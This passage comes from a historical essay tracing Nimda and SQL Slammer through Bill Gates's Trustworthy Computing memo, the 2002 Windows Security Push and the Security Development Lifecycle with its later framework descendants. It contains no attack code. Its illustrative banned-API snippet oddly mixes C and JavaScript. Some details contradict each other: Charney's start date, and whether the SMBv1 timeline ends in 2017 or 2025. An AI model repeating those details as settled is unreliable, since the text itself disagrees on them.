"(a) from client to client via email, (b) from client to client via open network shares, (c) from web server to client via browsing of compromised web sites, (d) from client to web server via active scanning for and exploitation of various Microsoft IIS 4.0 / 5.0 directory traversal vulnerabilities" [@cert-ca-2001-26-nimda].

Some retellings give Nimda "five" propagation vectors, conflating distinct sub-paths or counting the reuse of Code Red II's root.exe as a separate vector. CERT's canonical taxonomy, reproduced verbatim above, is four [@cert-ca-2001-26-nimda]. The fifth-vector phrasing in popular retellings is folk-knowledge.

The connected-graph structure matters. The patch for the IIS Unicode directory-traversal bug (MS00-078, originally posted October 17, 2000) had been available for eleven months [@ms00-078-iis-traversal]. The patch for the IE MIME-handling bug (MS01-020, originally posted March 29, 2001) had been available for nearly six months [@ms01-020-ie-mime]. The MS01-033 patch behind Code Red and Code Red II had been available for three months [@ms01-033-idq]. Microsoft shipped the cumulative remediation as MS01-044 [@cert-ca-2001-26-nimda]. Every individual hole had been a known, patched single-issue vulnerability. Nimda took the graph of those holes and walked it.

The lesson is structural. Response treats vulnerabilities as point fixes. Nimda's empirical evidence was that, in a sufficiently large monoculture, the unpatched subsets of multiple vulnerabilities had become connected. Patching is a per-host, per-vulnerability operation; the attacker's view is the union over all hosts of the union over all unpatched vulnerabilities. The latter is a much larger surface.

SQL Slammer (January 25, 2003, 05:30 UTC)

Sixteen months after Nimda, the era's capstone arrived in the form of a 376-byte UDP datagram.

Slammer (also called Sapphire) exploited a buffer overflow in the SQL Server Resolution Service that Microsoft had patched in MS02-039, six months earlier. The payload was small enough to fit in a single UDP packet, and the protocol it targeted (UDP port 1434) was connectionless, so each scan was one packet, sent at line rate. The CAIDA measurement -- Moore, Paxson, Savage, Shannon, Staniford and Weaver, IEEE Security & Privacy 2003 -- is the primary record:

"Sapphire began to infect hosts slightly before 05:30 UTC on Saturday, January 25 (2003). [...] doubled in size every 8.5 seconds. [...] infected more than 90 percent of vulnerable hosts within 10 minutes [...] at least 75,000 hosts, perhaps considerably more [...] over 55 million scans per second." [@caida-slammer]

Popular retellings often round Slammer's reach to "75% of vulnerable SQL servers." The CAIDA primary measurement is ~75,000 hosts as the lower bound, and "more than 90 percent of vulnerable hosts within 10 minutes" as the saturation percentage [@caida-slammer]. The two figures are not the same.

The 8.5-second doubling time is the load-bearing number. Worm spread under random-constant-spread (RCS) scanning follows a logistic curve: exponential at the start, saturating as the worm runs out of vulnerable targets. The differential equation is well behaved and was modeled in detail by Stuart Staniford, Vern Paxson, and Nicholas Weaver at USENIX Security 2002, in a paper that predicted (six months before Slammer) that worms with sufficiently high scan rates would saturate the global vulnerable population in minutes, not hours [@staniford-paxson-weaver-2002].

Plug the parameters in and watch it happen:

{` // SI-style worm spread under random constant scanning. // dN/dt = K * N * (1 - N/V) // Where: // N(t) = infected population at time t (seconds) // V = total vulnerable population // K = effective contact rate per infected host per second // = (scans per second per host) * (V / address-space size) // // Slammer defaults (CAIDA Moore et al. 2003): // ~75,000 vulnerable MSSQL hosts (lower bound) // ~26,000 packets/sec sent from a typical infected host before bandwidth saturation // IPv4 routable space ~ 2^32 addresses, of which ~2^31 reachable // // Result: doubling time ~8.5 s, ~90% saturation in ~10 min.

The simulator says what CAIDA measured: saturation, regardless of where the human patch process starts from, in roughly ten minutes. Read that twice. There is no version of "patch faster" that wins this race. The race ends before a human operator can log in, open the bulletin, download the binary, and apply it. Even if every operator on the planet had been at their console with the patch staged and ready, they could not have outrun an 8.5-second doubling.

The logistic equation $dN/dt = KN(1 - N/V)$ has closed-form solution $N(t) = V / (1 + (V/N_0 - 1) e^{-Kt})$. The doubling time near the start (when $N \ll V$) is $\tau = \ln(2)/K$. For Slammer's measured doubling time of 8.5 seconds, $K = \ln(2)/8.5 \approx 0.0815$ per second. The time to reach 90% of $V$ from a seed of $N_0 = 1$ is $t_{90} = (1/K) \ln((V - N_0)/(N_0 \cdot V/(0.9V) - N_0)) \approx (1/K) \ln(0.9V/0.1) \approx (1/0.0815) \ln(9V)$. For $V = 75{,}000$, $t_{90} \approx 12.3 \cdot \ln(675{,}000) \approx 165$ seconds, plus the time spent in the slow start-up phase from $N_0=1$ to a few hundred infections. The empirical 10-minute figure includes both phases. The structural result is parameter-insensitive: any worm with a per-host scan rate that produces a sub-minute doubling will saturate before any human operator can intervene.

If the attacker's loop (find bug, weaponize, propagate) is now structurally faster than the defender's loop (find bug, ship patch, customer installs), then "patch faster" stops being the answer and a different answer becomes necessary. The only durable defense against a sub-minute doubling time is to ship fewer vulnerabilities to begin with. That requires changes upstream of the patch pipeline -- in how code is written, reviewed, tested, and signed off.

Which is what the advisory version of secure development had been preaching since 1975.

So why was Microsoft still shipping idq.dll-class bugs in 2001?

5. What Microsoft Already Had (and Why It Wasn't Enough)

This is the section that confronts the literal thesis head-on. Take an inventory of what existed, in Microsoft and outside it, on January 1, 2002:

Microsoft Security Response Center (MSRC). Founded in 1998 to coordinate vulnerability disclosure and ship security bulletins (the numbered series MS98-001 onward) [@msrc-org] [@howard-lipner-push-2003]. The org chart was real; so was the bulletin pipeline; so was the working relationship with CERT/CC and external researchers.
Secure Windows Initiative (SWI). Started around 2000 as a small in-house secure-development team, led by Michael Howard inside the Windows division [@howard-lipner-push-2003].
STRIDE. A categorical list of threat types (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege), written by Loren Kohnfelder and Praerit Garg in an internal Microsoft memo dated April 1, 1999, titled "The Threats to Our Products." The memo is no longer hosted on Microsoft's own site, but it has been publicly preserved at Adam Shostack's archive [@shostack-stride-memo-archive], with an independent mirror at FIRST [@first-stride-memo-mirror]; Shostack's 2014 book remains the authoritative chain-of-custody analysis [@shostack-tm-book].
A Microsoft-authored secure-coding book. Michael Howard and David LeBlanc's Writing Secure Code, Microsoft Press, first edition November 2001 -- two months before the memo. Bill Gates is widely reported to have required Microsoft engineers to read it; the book itself documents the banned-API list, threat-modeling templates, and STRIDE walkthroughs that the Push later mandated [@howard-leblanc-wsc].

Outside Microsoft, the substrate was older still:

Saltzer and Schroeder. Jerome Saltzer and Michael Schroeder, "The Protection of Information in Computer Systems," Proceedings of the IEEE 63(9), September 1975. Eight design principles -- economy of mechanism, fail-safe defaults, complete mediation, open design, separation of privilege, least privilege, least common mechanism, psychological acceptability -- still the textbook starting point [@saltzer-schroeder-1975].
The Orange Book. DoD Trusted Computer System Evaluation Criteria (DoD 5200.28-STD), 1983 and reissued 1985. Graded assurance levels D, C1, C2, B1, B2, B3, A1. The pre-existing vocabulary of "trusted computing" that the Gates memo deliberately echoed and broadened to "trustworthy" [@tcsec-orange-book].
OpenBSD audit culture. Theo de Raadt's OpenBSD project, since the summer of 1996, with a permanent audit team that the project's own page describes verbatim: "Our security auditing team typically has between six and twelve members who continue to search for and fix new security holes. We have been auditing since the summer of 1996" [@openbsd-security].
Attack trees. Bruce Schneier, "Attack Trees," Dr. Dobb's Journal, December 1999. A formal methodology for describing system security as goal-rooted decision trees with AND/OR composition and per-leaf cost annotations [@schneier-attack-trees-1999].
CERT/CC. Carnegie Mellon's Computer Emergency Response Team, founded November 1988 in response to the Morris worm. Author of the CA-1999-04 / CA-2001-19 / CA-2001-26 / CA-2000-04 advisories that frame the previous two sections [@cert-ca-1999-04-melissa] [@cert-ca-2001-19-codered] [@cert-ca-2001-26-nimda] [@cert-ca-2000-04-iloveyou].

Lay those rows out as a table and look at the right-most column:

Discipline component	Who had it	When	Release-blocking authority?
Foundational principles	Saltzer and Schroeder [@saltzer-schroeder-1975]	1975	No (academic publication)
Graded assurance criteria	DoD Orange Book [@tcsec-orange-book]	1985	No (procurement criterion only)
Response coordination	CERT/CC [@cert-ca-1999-04-melissa]	1988	No (external coordinator)
Audit-driven engineering	OpenBSD [@openbsd-security]	1996	Yes -- within OpenBSD only
Vendor response center	MSRC [@msrc-org] [@howard-lipner-push-2003]	1998	No (post-release)
Internal threat categorization	Kohnfelder and Garg STRIDE memo [@shostack-tm-book] [@shostack-stride-memo-archive]	April 1999	No (advisory)
External threat-modeling methodology	Schneier attack trees [@schneier-attack-trees-1999]	December 1999	No (publication)
In-house secure-development team	SWI (Howard) [@howard-lipner-push-2003]	~2000	No (advisory)
Secure-coding book	Howard and LeBlanc [@howard-leblanc-wsc]	November 2001	No (recommendation)

The load-bearing column is the last one. Every row except OpenBSD-within-OpenBSD reads No, and OpenBSD's "Yes" is a special case -- the auditors and the engineers were the same self-selected community on a small homogeneous codebase shipped without a revenue obligation.

That column is the article's first aha moment.

Key idea: Microsoft was not the first to articulate secure-systems-design principles (Saltzer and Schroeder, 1975). It was not the first to do audit-driven engineering (OpenBSD, 1996). It was not the first to popularize threat modeling externally (Schneier, December 1999), have an internal threat-categorization framework (Kohnfelder and Garg, April 1999), or run a security-response organization (CERT/CC since 1988; MSRC since 1998). What Microsoft was first to do, on January 15, 2002 and operationalized on February 11, 2002, was apply release-blocking executive authority across an entire dominant-platform vendor to make secure development a non-negotiable engineering gate.

The corrected sentence is harder to fit on a magazine cover. It is also defensible.

OpenBSD shipped audit-driven engineering culture six years before the Windows Security Push, with the slogan its security page has carried for two decades: Only two remote holes in the default install, in a heck of a long time! -- OpenBSD Project, security page [@openbsd-security]

OpenBSD's model worked for a small homogeneous codebase with self-selected auditors and a permissive-license, no-revenue context. The SDL's model was built for a fifty-thousand-person, hundred-million-line, quarterly-revenue context. They are parallel paths, not competitors. The era's lesson is that both were necessary discoveries; neither alone would have served the other's population.

What did "advisory" mean in 2000-2001 Microsoft? Steve Lipner's ACSAC 2004 paper is explicit: in the pre-Push state, an engineering manager could decline a security review with no organizational consequence. SWI could recommend. SWI could not require. The Microsoft-authored book sat on every engineer's desk and the threat-categorization memo had been internal for almost three years -- and Code Red v1, Code Red v2, Code Red II, and Nimda all exploited code that had shipped after SWI's founding [@howard-lipner-push-2003] [@lipner-acsac-2004].

That is the empirical evidence the era ran on. Methods without authority did not stop the worms.

Microsoft was not the first to articulate, audit, popularize, categorize, or respond. Microsoft was the first to make secure development non-negotiable at desktop-monopoly scale.

So if the methods, the books, the threat-modeling framework, the response center, the engineers, and the public peer pressure were all already there, what changed at 5:22 PM Pacific on Tuesday, January 15, 2002?

6. The Memo (January 15, 2002)

Open with the email header itself, preserved verbatim by Wired's republication and the Help With Windows mirror, both of which kept the original From:, Sent:, To:, Subject: block intact:

-----Original Message-----
From: Bill Gates
Sent: Tuesday, January 15, 2002 5:22 PM
To: Microsoft and Subsidiaries: All FTE
Subject: Trustworthy computing

[@gates-memo-wired] [@helpwithwindows-billg]

Popular retellings sometimes describe the memo as a "5 AM email Bill Gates wrote in the dark." The preserved mail headers above are unambiguous: the memo was sent at 5:22 PM Pacific on a Tuesday afternoon, with full distribution to "Microsoft and Subsidiaries: All FTE" -- every full-time employee of the company [@gates-memo-wired] [@helpwithwindows-billg]. The 5 AM phrasing is folk-knowledge; the headers preserved by Wired are the primary record.

The memo runs roughly 1,500 words. It is structured around four pillars -- Security, Privacy, Reliability, and Business Integrity -- that, the memo argues, must take precedence over feature work whenever the two are in tension [@gates-memo-wired]:

Pillar	What the memo asks for
Security	Code resilient to attack; products that ship secure out of the box, by default, in deployment.
Privacy	Products that handle customer data with informed consent and minimal collection.
Reliability	Products that fail predictably and recover gracefully; uptime as a measurable property.
Business Integrity	Transparent dealings; respect for the customer relationship across the company's behavior, not just its products.

Read the four together and the structure is not a list of features. It is a redefinition of what shipping the product means. A Windows release in 2001 shipped when the feature list closed; the memo proposed that, going forward, a Windows release ships when feature list, security posture, privacy posture, reliability posture, and the company's standing with the customer were all simultaneously acceptable.

The operational anchor of the memo is one sentence every subsequent retelling quotes, and that the Push directly inherited as its decision rule:

"When we face a choice between adding features and resolving security issues, we need to choose security." -- Bill Gates, "Trustworthy computing" memo, January 15, 2002 [@gates-memo-wired]

Note what the memo did not do. It did not name an algorithm. It did not invent STRIDE; STRIDE had been internal for two and a half years already [@shostack-tm-book]. It did not write banned.h; the banned-API list had been in Howard and LeBlanc's book on bookshelves for two months [@howard-leblanc-wsc]. And, contrary to a common retelling, it did not delay the launch of Visual Studio .NET.

Visual Studio .NET launched on schedule on February 13, 2002, four weeks after the memo, at the VSLive! 2002 Conference in San Francisco, with Bill Gates delivering the keynote address [@msft-news-vsnet-launch-2002]. The December 2001 work the retrospectives sometimes call a "delay" was a pre-launch security review of the .NET runtime; the memo references that review by name as the template for what the company was about to do across every product [@gates-memo-wired]. The "delayed by security" framing is folk-knowledge; the memo itself describes VS .NET's December review as a success story.

What the memo did do was supply the one input every other piece on the table had been missing: executive authority, top-down, to halt feature work on security grounds without arguing about it.

To see why that is the operational form of the memo's contribution, compare it to Gates's two other priority memos. The "Internet Tidal Wave" of May 26, 1995 redirected Microsoft toward the web; the company restructured around online services and browser strategy in its wake [@gates-tidal-wave-bbc-pdf]. The .NET / NGWS strategy memo, delivered alongside Gates's Forum 2000 keynote on June 22, 2000, redirected the company toward managed code and a unified runtime; Visual Studio .NET, the CLR, ASP.NET, and ADO.NET all trace to it.Common retellings date the .NET strategy memo to 1999. The Microsoft News Center record places the NGWS / .NET unveiling at Forum 2000 on June 22, 2000; the strategy was branded "Next Generation Windows Services" before the .NET name stuck. The 1999 dating slips in because the underlying COM-runtime work began earlier, but the company-wide priority memo is a 2000 document.

Both pointed Microsoft at something new. Trustworthy Computing was different in shape. It did not redirect the company toward something new. It halted the company in place. The pillars were not a roadmap; they were a precondition. That structural difference -- stop, before you start anything else -- is what gave the Push its character.

The memo named three deputies who would carry the program forward. Craig Mundie (then Microsoft's chief technical officer, leading the Trustworthy Computing leadership team) was the named architect of the Trustworthy Computing initiative itself [@msft-news-charney-jan-2002]; Jeff Raikes (then Group Vice President for Productivity and Business Services) carried the program into Office [@msft-news-raikes-fusion-2002]; and on January 31, 2002 -- sixteen days after the memo -- Microsoft announced the hire of Scott Charney from PricewaterhouseCoopers' Cybercrime Prevention and Response Practice as Chief Security Strategist, with a start date of April 1, 2002, to make the program operationally permanent [@msft-news-charney-jan-2002]. Charney would lead Microsoft's Trustworthy Computing organization for the next thirteen years. The memo was one event; the people who made it survive past the ten-week Push were the institutional half of the story.

The memo was the discrete institutional moment. What it required next was the operationalization step that converted it from rhetoric into engineering. That step took twenty-seven days to start and roughly ten weeks to run.

7. The Windows Security Push (February-April 2002)

The mechanics come from Michael Howard and Steve Lipner's IEEE Security and Privacy paper of January-February 2003, "Inside the Windows Security Push," and from Lipner's December 2004 ACSAC paper "The Trustworthy Computing Security Development Lifecycle." Stripped of the framing, the numbers are:

Feature work in the Windows Division halted on or about February 11, 2002 [@howard-lipner-push-2003].
The Push ran for approximately ten weeks, through April 2002 [@howard-lipner-push-2003].
The participating headcount was approximately 8,500 Windows engineers [@howard-lipner-push-2003].The round figure of "10,000 engineers" in many retrospectives is a company-wide aggregate that includes the serial Office, .NET, and SQL Server pushes that followed through 2002-2003. The Windows-only Push figure from the Howard and Lipner primary is ~8,500; the trade-press corroboration (Washington Technology, July 2002) cross-references Gates's own July 19, 2002 internal newsletter [@howard-lipner-push-2003] [@washtech-microsoft-100m].
The total cost in foregone feature work was approximately $100 million [@washtech-microsoft-100m] [@howard-lipner-push-2003].
The measurable outcome was approximately a 50% reduction in publicly reported security vulnerabilities for Windows Server 2003 over comparable post-release windows versus Windows 2000 [@howard-lipner-push-2003].The ~50% figure is per-window externally-discovered vulnerability counts, per Howard and Lipner 2003 -- not per-KLoC defect density. The narrative role (measurable post-release improvement) holds either way, but the caveat matters for readers reusing the number.

The Push pipeline looked like this:

flowchart LR A[Mandatory training: Howard, Lipner, LeBlanc as instructors] --> B[STRIDE threat model per component] B --> C[Banned-API audit against banned.h and strsafe.h] C --> D[Fuzz testing of network-facing components] D --> E[Final Security Review gate] E --> F[Release approval or block]

Three of the boxes in that pipeline need definitions, because they are the load-bearing terms the rest of the article and every SDL descendant inherit.

A C header authored at Microsoft during and after the Push that re-declares roughly forty unsafe C runtime functions (`strcpy`, `strcat`, `gets`, `sprintf`, `_snprintf`, `wcscpy`, `_mbscpy`, and more) as compile-time errors. The pattern is a `#pragma deprecated` plus a `#define` that expands to an undefined symbol, so any source file that includes `banned.h` and then calls a banned function fails to compile. The descendant in Microsoft's current Windows driver toolchain is the static-analyzer warning **C28719**, which release-gates Windows driver submissions to this day [@msft-c28719]. A safer-by-default replacement string-handling API set introduced by Microsoft alongside `banned.h`. The `Strsafe.h` header (and the Win32 reference page that still ships in Microsoft Learn) defines `StringCbCopy`, `StringCbCat`, `StringCbPrintf`, `StringCchCopy`, `StringCchCat`, `StringCchPrintf`, and their wide-character variants. Every function takes an explicit destination-buffer size and returns an `HRESULT` so the caller can detect truncation rather than overrun [@msft-strsafe]. The C11 `_s` family (`strcpy_s`, `strcat_s`, `sprintf_s`) is the standards-track parallel. The release-blocking sign-off step at the end of the SDL pipeline. Before a product can ship, an FSR examines the threat model, the residual vulnerabilities, the banned-API audit results, the fuzz-test coverage, the static-analysis warnings, and the operational response plan, and decides whether the release meets the security bar. A failed FSR blocks the release. The FSR is the single component that converts every preceding "should" into a hard "must" -- it is where the advisory pipeline becomes the mandatory one [@lipner-acsac-2004] [@howard-lipner-sdl-book].

Place the same banned-API substitution that every Windows engineer learned that spring next to its FSR-approved replacement, with the surviving 2026 compiler-enforced warning called out:

{` // BEFORE THE PUSH -- this compiles, and overflows if src is too long. // C runtime; allowed in C89; the entire bug class behind Code Red et al. void copyName_BANNED(char* dst, const char* src) { // strcpy(dst, src); // After banned.h is included, the above line FAILS TO COMPILE: // error C4996: 'strcpy': This function or variable may be unsafe. // error C28719: Banned API Usage: strcpy is a Banned API. }

// AFTER THE PUSH -- this is the FSR-approved replacement. // strsafe.h, mandatory after February 2002 for Windows code. // Microsoft's C28719 still release-gates Windows drivers in 2026. function copyName_OK(dst, dstSize, src) { // StringCbCopy(dst, dstSize, src); // Returns S_OK on success, STRSAFE_E_INSUFFICIENT_BUFFER on truncation. // The compiler knows dstSize; the static analyzer can prove the bound. console.log('FSR-approved: explicit destination size, returns HRESULT.'); }

copyName_OK('buffer', 16, 'David Cutler'); `}

The substitution is the entire engineering theme of the Push in one line. strcpy(dst, src) is undecidable in the general case: you cannot prove from the call site that src fits in dst without information the call site does not have. StringCbCopy(dst, dstSize, src) is mechanically checkable: the destination size is explicit, the function returns truncation as a recoverable error, and a static analyzer can verify the bound at every call site. The class of bugs behind Code Red did not become easier to write; it became uncompilable.

The state change is best shown as a comparison table:

Discipline component	Pre-Push state	Post-Push state
Training	Opt-in; not all engineers attended	Mandatory across the Windows Division [@howard-lipner-push-2003]
Threat modeling	Per-team optional	Per-component mandatory; STRIDE-driven [@howard-lipner-push-2003]
Banned-API enforcement	Recommended in the SWI guidance	Compile-time error via `banned.h`; replacement via `strsafe.h` [@msft-strsafe] [@msft-c28719]
Code review	Voluntary	Release-gate via Final Security Review [@lipner-acsac-2004]
Authority	Advisory (SWI could recommend)	Release-blocking (FSR could block) [@lipner-acsac-2004]
Measurable outcome	None published	~50% reduction in publicly reported vulnerabilities, WS2003 vs Win2000 [@howard-lipner-push-2003]

The right-hand column is, line by line, the same activities the left-hand column lists. Training is training. Threat modeling is threat modeling. The banned-API list is the same list LeBlanc and Howard had been publishing for years. Static analysis is static analysis. What changed in every row is the verb: from "may," "should," and "recommended" to "must," "shall," and "release-blocking."

Key idea: The breakthrough was organizational, not technical. The Push used the same training material, the same banned-API list, the same threat-modeling framework, and the same code-review checklist that SWI, Howard, LeBlanc, and Schneier had been writing for two years. What changed was the signoff power. Training became mandatory; threat modeling became per-component-mandatory; banned APIs became compile-time errors; code review became a release gate; and the Final Security Review acquired the authority to block a ship date. The Push did not invent new methods. It gave the existing methods executive authority.

Note: Same checklists, different signoff power. That single sentence is the unit of work the Push did. Every other secure-development framework on the industry shelf in 2026 is, organizationally, a restatement of that unit at different scales: BSIMM observes how vendors did it, OWASP SAMM prescribes how to do it, NIST SSDF mandates it for U.S. federal suppliers, ISO/IEC 27034 makes it certifiable. The technology was downstream of the authority [@bsimm-home] [@owasp-samm-model] [@nist-ssdf-218] [@iso-27034-1].

Ten weeks of training is one event. A discipline is a repeatable event. The Push needed to be codified into something a product team could do on every release.

8. What the Discipline Became: The SDL Lineage (2002-2006)

Codification ran in two steps.

The first step was Steve Lipner's ACSAC 2004 paper, "The Trustworthy Computing Security Development Lifecycle," the first formal external description of the SDL as a multi-phase release-engineering process [@lipner-acsac-2004]. ACSAC is a peer-reviewed venue with a security-practitioner audience; the paper put the program on the academic record and started the citation chain.

The second step was the book. Howard and Lipner, The Security Development Lifecycle, Microsoft Press 2006 (ISBN 978-0-7356-2214-2) [@howard-lipner-sdl-book]. The book documents every phase, every checklist, every threat-modeling template, every banned-API entry, every FSR criterion. It is what made the methodology exportable: an organization not named Microsoft could pick up the book and run an SDL-shape program of its own.

A software-engineering process model that integrates security activities into every phase of a product release. The canonical Microsoft formulation, in the 2006 Howard and Lipner book, is a seven-phase pipeline: Training, Requirements, Design (with mandatory STRIDE threat modeling), Implementation (with banned-API enforcement and mandatory static analysis), Verification (fuzz testing and dynamic analysis), Release (Final Security Review and a signed-off response plan), and Response (feeds back into MSRC). The current Microsoft public formulation organizes the same activities as 10 practices spanning 5 lifecycle stages: Design, Code, Build and Deploy, Run, and Zero Trust governance [@msft-sdl-practices] [@msft-sdl-overview].

The SDL phase pipeline in its canonical 2006 form:

flowchart LR A[Training] --> B[Requirements] B --> C[Design: STRIDE threat modeling] C --> D[Implementation: banned-API + static analysis] D --> E[Verification: fuzz + dynamic analysis] E --> F[Release: Final Security Review] F --> G[Response: MSRC] G -.feedback.-> A

The current Microsoft SDL has shifted with the industry. The 2026 public formulation organizes the same activities as ten practices spanning five lifecycle stages: Design, Code, Build and Deploy, Run, and Zero Trust governance [@msft-sdl-practices] [@msft-sdl-overview]. Practices 1, 3, and 10 (security standards, threat modeling, training) map directly back to the 2002 Push and the 2006 book. Practices 2 and 4 (proven security features and cryptography standards) became prominent after the 2014-2017 TLS-bug wave: Heartbleed in April 2014 [@nvd-cve-2014-0160-heartbleed], POODLE in October 2014, Logjam in May 2015, ROBOT in December 2017. Practices 5 through 9 (supply chain, engineering environment, security testing, operational platform, monitoring and response) absorb post-SolarWinds (December 2020), Log4Shell (December 2021), and xz-utils (March 2024) lessons that did not exist in the original 2006 codification [@cisa-secure-by-design] [@slsa-home] [@freund-xz-disclosure].

The SDL did not invent training, did not invent threat modeling, did not invent banned APIs, and did not invent audit-driven review. What it did was assemble them, mandate them, and gate releases on them at a scale and authority no one had previously attempted at a desktop-monopoly vendor. Saltzer and Schroeder (1975), OpenBSD (1996), CERT/CC (1988), Schneier (1999), Kohnfelder and Garg (1999), and Howard and LeBlanc (2001) all contributed substrate; the SDL was an organizational achievement that depended on every one of those.

Two people deserve named credit for the SDL surviving past its 2002 birth. Scott Charney, joining Microsoft in March 2002 as Chief Security Strategist, ran the Trustworthy Computing organization for thirteen years and kept the program funded, staffed, and politically supported through three Windows releases (XP SP2 in 2004, Vista in 2006, Windows 7 in 2009). Steve Lipner became the program's external voice -- the IEEE *Security and Privacy* paper, the ACSAC paper, the Microsoft Press book, and the conference circuit that turned an internal-Microsoft methodology into an industry-wide practice. The historical credit for "founding" goes to Gates; the historical credit for *sustaining* goes to Charney and Lipner.

A discipline becomes industry-standard when other organizations adopt or are compelled to adopt it. What happened to the SDL's template between 2006 and 2026?

9. What the Era Taught the Next 25 Years

Every major secure-development framework published since 2006 traces a recognizable lineage back to the same Push-shape ancestor. The genealogy fans out:

flowchart TD P0[2002 Windows Security Push] --> M1[2004 Microsoft SDL Lipner ACSAC] M1 --> B[2008 BSIMM descriptive 128 activities] M1 --> S[2009 OWASP SAMM prescriptive 15 practices] M1 --> I[2011 ISO/IEC 27034 certifiable] M1 --> F[2018 SAFECode Fundamental Practices 3rd ed] M1 --> N[2022 NIST SSDF SP 800-218 federal-supplier] M1 --> L[2021-2023 SLSA Build track post-SolarWinds] M1 --> C[2023 CISA Secure by Design + Pledge]

The shorthand for each descendant:

Microsoft SDL. The 2004 ACSAC paper and the 2006 book; today's ten-practice five-stage formulation [@lipner-acsac-2004] [@msft-sdl-practices].
BSIMM. The Building Security In Maturity Model, descriptive (not prescriptive): 128 activities observed across 111 organizations in 8 industries, grouped into 12 practices in 4 domains [@bsimm-home].
OWASP SAMM v2. Open Software Assurance Maturity Model, prescriptive: 15 security practices grouped into 5 business functions (Governance, Design, Implementation, Verification, Operations), with 3 maturity levels per practice [@owasp-samm-model] [@owasp-samm-about].
ISO/IEC 27034-1:2011. The first internationally certifiable application-security standard, confirmed in 2022 [@iso-27034-1].
SAFECode Fundamental Practices, 3rd ed. A community-curated practice catalog from the Software Assurance Forum for Excellence in Code, with an explicit smallest-organization onramp [@safecode-fundamental-practices].
NIST SP 800-218 (SSDF). The Secure Software Development Framework, February 2022; legally voluntary in form but de-facto mandatory for U.S. federal suppliers via Executive Order 14028 and OMB Memorandum M-22-18 [@nist-ssdf-218].
SLSA v1.0. Supply-chain Levels for Software Artifacts, the post-SolarWinds extension that adds build-integrity attestation to the SDL pattern [@slsa-v1-levels] [@slsa-home].
CISA Secure by Design and the Secure-by-Design Pledge. A U.S. federal policy framework restating the SDL principles as expectations on commercial software vendors; the Pledge is voluntary and not legally binding [@cisa-secure-by-design] [@cisa-sbd-pledge].

Below the family tree, every organization that picks one of these frameworks is also making a context-specific decision. A 2026 decision guide -- drawn from the SOTA work -- looks like this:

Situation	Primary framework	Threat modeling	Supply chain	Memory safety
Large proprietary vendor	Microsoft SDL [@msft-sdl-practices]	STRIDE in Microsoft TM Tool [@msft-threat-modeling-tool]	SLSA Build L3 [@slsa-v1-levels]	Rust in new components [@weston-bluehat-il-2023] [@cisa-memory-safe-roadmaps]
U.S. federal supplier	NIST SSDF + Secure by Design [@nist-ssdf-218] [@cisa-secure-by-design]	Manifesto-aligned [@threat-modeling-manifesto]	SLSA Build L2+ [@slsa-v1-levels]	CISA memory-safe roadmap [@cisa-memory-safe-roadmaps]
Mid-size SaaS	OWASP SAMM [@owasp-samm-model]	OWASP Threat Dragon [@owasp-threat-dragon]	SLSA Build L1 [@slsa-v1-levels]	Language choice per service
Open-source project	SAFECode + SLSA [@safecode-fundamental-practices] [@slsa-home]	STRIDE or LINDDUN	SLSA Build L1 + provenance	Language choice per project
Privacy-critical	LINDDUN	LINDDUN + DPIA	per regulator	per language toolchain
AI/LLM-integrated	NIST AI RMF + OWASP LLM Top 10 [@nist-ai-rmf] [@owasp-llm-top-10]	LLM Top 10 categories	per model supply chain	per language toolchain

The table is a snapshot, not a prescription; the underlying point is that every cell is a child of the same 2002 organizational pattern, specialized to a population.

The five-stage cohort-migration playbook

Every meaningful security improvement since 2002 has had to walk a population through the same five-stage migration without breaking the legitimate-use long tail. The stages, drawn directly from how Microsoft has operated and what the larger industry has copied:

Ship telemetry first. Before flipping any default, instrument the current behavior so you know who is using it, how, and how often.
Publish guidance naming the unsafe path as exceptional. Documentation calls the behavior "supported but deprecated"; the change is announced.
Flip the default behind documented escape hatches. The new default is safe; users with a legitimate need can still opt back in via Group Policy, a registry key, an unblock checkbox, or an admin command.
Deprecate on a published schedule. Telemetry says the long tail is small enough to commit to a removal date; the date is announced one or more years out.
Remove the capability. The feature is no longer present; the escape hatch is no longer reachable.

Two worked examples make the playbook concrete -- the Office VBA macro block of 2022 and the SMBv1 deprecation of 1996-2017.

Office VBA macros from the internet (announced February 2022). Microsoft committed to blocking VBA macros in Office documents that arrived from the internet (carrying the Mark of the Web). The five-channel rollout, as documented and re-documented on the current Microsoft Learn page, ran:

Channel	Default-block date
Current Channel Preview 2203	April 12, 2022
Current Channel 2206	July 27, 2022 (after a July 2022 pause-and-resume)
Monthly Enterprise 2208	October 11, 2022
Semi-Annual Enterprise (Preview) 2208	October 11, 2022
Semi-Annual Enterprise 2208	January 10, 2023

[@ms-learn-internet-macros-blocked]

The escape hatches were explicit: per-document Unblock from the file's Properties dialog, configured Trusted Locations, signed-by-Trusted-Publishers, or Group Policy overrides for managed environments [@ms-learn-internet-macros-blocked]. The capability was not removed -- the playbook stopped at stage 3. The July 2022 pause-and-resume is the playbook's self-correcting feedback loop in action: Microsoft paused the Current Channel rollout in response to deployment-side issues, fixed them, and resumed [@ms-learn-internet-macros-blocked]. That this fix took twenty-seven years from Concept's 1995 first detection to the Office VBA macro block of February 2022 is the era's tax for cohort migration without breaking the legitimate-use long tail.

SMBv1 deprecation (1996 to 2025). Server Message Block version 1 shipped in 1996. Microsoft publicly deprecated SMBv1 in 2014 (the long tail was many years of legacy installations). Ned Pyle, Principal Program Manager for Microsoft's Storage and File Services team, published the canonical "Stop using SMB1" Tech Community post on September 16, 2016 [@pyle-stop-using-smb1]. May and June 2017 brought the empirical forcing function: the WannaCry ransomware in May, the NotPetya wiper in June, both exploiting EternalBlue against SMBv1. October 2017's Windows 10 version 1709 shipped SMBv1 off by default. Windows Server 2019 and later, plus Windows 11, do not install SMBv1 at all. For Windows Home and Pro, the SMBv1 client auto-uninstalls after 15 days of non-use [@ms-learn-smbv1-not-installed]:

Year	Event
1996	SMBv1 ships with Windows NT 4.0
2014	Public deprecation announced
September 16, 2016	Ned Pyle's "Stop using SMB1" Tech Community post [@pyle-stop-using-smb1]
May-June 2017	WannaCry and NotPetya empirical forcing function
October 2017 (1709)	SMBv1 default-off in Windows 10
Windows Server 2019+, Windows 11	Not installed by default; 15-day auto-uninstall on Home/Pro [@ms-learn-smbv1-not-installed]

Note: "Deprecation takes a decade" is not vendor inefficiency. It is the cost of executing each playbook stage without breaking the legitimate-use long tail of business-critical software that depends on the capability. An empirical forcing function -- a worm, a ransomware wave, a public catastrophe -- is what compresses the late stages from years to months. WannaCry and NotPetya did to SMBv1 in 2017 what Code Red and Nimda did to the Windows defaults in 2002.

